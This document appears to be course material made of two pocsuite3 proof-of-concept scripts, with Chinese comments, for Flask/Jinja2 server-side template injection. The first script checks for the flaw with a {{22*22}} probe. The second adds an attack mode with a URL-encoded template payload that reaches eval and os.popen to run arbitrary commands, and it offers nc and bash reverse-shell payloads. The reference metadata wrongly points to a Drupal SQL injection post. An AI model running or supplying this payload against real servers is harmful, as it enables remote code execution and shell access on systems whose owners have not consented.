验证部分:
# 调用pocsuite的一些API函数 from pocsuite3.api import Output, register_poc, requests, POCBase # 继承POCBase类 class DemoPOC(POCBase): vulID = '1571' # ssvid ID, 如果是提交漏洞的同时提交PoC,则写出0 version = "1" # 版本 author = "tedu" # 作者名称 vulDate = '2020-10-16' # 漏洞公开时间 createDate = '2020-10-16' # 编写POC时间 updateDate = '2020-10-16' # 更新POC时间 references = [ 'https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html'] # 漏洞地址来源,0day不用写 name = 'Flask Jinjia2 模板注入漏洞' # POC名称 appPowerLink = 'https://www.example.org' # 漏洞厂商的主页地址 appName = 'example' # 漏洞应用名称 appVersion = '7.x' # 漏洞影响版本 vulType = 'SSTI Injection' # 漏洞类型 desc = """ 在接收用户输入时,没有对{{}}这样的模板语法做过滤,导致{{}}中可以填写执行的程序。 """ # 漏洞简要描述 samples = [] # 测试样例,使用POC测试成功的网站 install_requires = [] # 定义--verify参数,poc函数 def _verify(self): '''verify mode''' result = {} path = "/?name=" url = self.url + path payload = '{{22*22}}' # first req try: resq = requests.get(url + payload) print(resq.text) # 判断对象,服务器状态码,服务器页面回显是否正确 if resq and resq.status_code == 200 and '484' in resq.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url result['VerifyInfo']['Name'] = payload except Exception as e: pass # 将服务器信息传入到该函数中 return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable.') # 返回成功或失败消息 return output # 注册poc register_poc(DemoPOC)
验证+攻击
from pocsuite3.api import Output, register_poc, requests, POCBase, REVERSE_PAYLOAD, OptDict from collections import OrderedDict class DemoPOC(POCBase): vulID = '1571' # ssvid ID, 如果是提交漏洞的同时提交PoC,则写出0 version = "1" # 版本 author = "tedu" # 作者名称 vulDate = '2020-10-16' # 漏洞公开时间 createDate = '2020-10-16' # 编写POC时间 updateDate = '2020-10-16' # 更新POC时间 references = [ 'https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html'] # 漏洞地址来源,0day不用写 name = 'Flask Jinjia2 模板注入漏洞' # POC名称 appPowerLink = 'https://www.example.org' # 漏洞厂商的主页地址 appName = 'example' # 漏洞应用名称 appVersion = '7.x' # 漏洞影响版本 vulType = 'SSTI Injection' # 漏洞类型 desc = """ 在接收用户输入时,没有对{{}}这样的模板语法做过滤,导致{{}}中可以填写执行的程序。 """ # 漏洞简要描述 samples = [] # 测试样例,使用POC测试成功的网站 install_requires = [] def _verify(self): """verify mode""" result = {} path = "/?name=" url = self.url + path payload = "{{22*22}}" try: resq = requests.get(url + payload) if resq and resq.status_code == 200 and "484" in resq.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url result['VerifyInfo']['NAME'] = payload except Exception as e: pass return self.parse_output(result) # 定义其他选项参数 def _options(self): # 字典排序 o = OrderedDict() payload = { "nc": REVERSE_PAYLOAD.NC, "bash": REVERSE_PAYLOAD.BASH, } # 设置默认值 o["command"] = OptDict(selected="bash", default=payload) return o def _attack(self): result = {} path = "?name=" url = self.url + path # print(url) cmd = self.get_option("command") #攻击载荷 name对应的值就是攻击载荷 payload = "name=%7B%25%20for%20c%20in%20().__class__.__bases__%5B0%5D.__subclasses__()%20%25%7D%0A%20%20%20%20%7B%25%20if%20c.__name__%20==%20'WarningMessage'%20%25%7D%0A%20%20%20%20%20%20%20%20%7B%7B%20c.__init__.__globals__%5B'__builtins__'%5D%5B'eval'%5D('__import__(%22os%22).popen(%22"+cmd+"%22).read()')%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D" # print(payload) try: resq = requests.get(url + payload) t = resq.text t = t.replace('\n', '').replace('\r', '') print(t) t = t.replace(" ", "") result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = url result['VerifyInfo']['Name'] = payload except Exception as e: return return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail("target is not vulnerable") return output register_poc(DemoPOC)